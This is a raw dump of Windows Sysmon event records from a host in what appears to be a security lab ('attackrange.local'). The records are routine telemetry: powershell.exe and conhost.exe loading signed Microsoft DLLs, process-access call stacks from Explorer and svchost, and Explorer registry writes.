17:30:15.632{21761711-83AE-607D-1600-00000000BB01}11081152C:\Windows\system32\svchost.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530485Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft 
CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x80000000000000001530484Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001530483Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x80000000000000001530482Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x80000000000000001530481Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 
(rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001530480Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001530479Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001530478Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001530477Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001530476Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001530475Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001530474Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 
734700x80000000000000001530473Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001530472Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560DtrueMicrosoft WindowsValid 734700x80000000000000001530471Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001530470Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft 
Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001530469Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001530468Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001530467Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 13241300x80000000000000001530466Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
17:30:15.632{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000B0498\VirtualDesktopBinary Data 12241200x80000000000000001530465Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.632{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000B0498 13241300x80000000000000001530464Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.632{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000012069A\VirtualDesktopBinary Data 12241200x80000000000000001530463Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.632{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000012069A 13241300x80000000000000001530462Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530461Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
17:30:15.617{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 10341000x80000000000000001530460Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530459Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001530458Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530457Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C8-607D-EE00-00000000BB01}32603680C:\Windows\system32\taskhostw.exe{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530456Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C8-607D-EE00-00000000BB01}32603680C:\Windows\system32\taskhostw.exe{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001530455Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530454Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValid 10341000x80000000000000001530453Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530452Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 10341000x80000000000000001530451Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
12241200x80000000000000001530450Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 10341000x80000000000000001530449Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530448Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530447Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530446Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530445Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530444Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750AtrueMicrosoft WindowsValid 734700x80000000000000001530443Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\msctf.dll10.0.14393.4225 (rs1_release.210127-1811)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=1FD254D30743876981194F7E17ECDB6F,SHA256=0CB67AC140097A888B7ED85C9A31F8967D16661B82557CE5D61FA70A85BDF8B8trueMicrosoft WindowsValid 10341000x80000000000000001530442Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-83AE-607D-1600-00000000BB01}11084896C:\Windows\system32\svchost.exe{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530441Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-83AE-607D-1600-00000000BB01}11081152C:\Windows\system32\svchost.exe{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530440Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
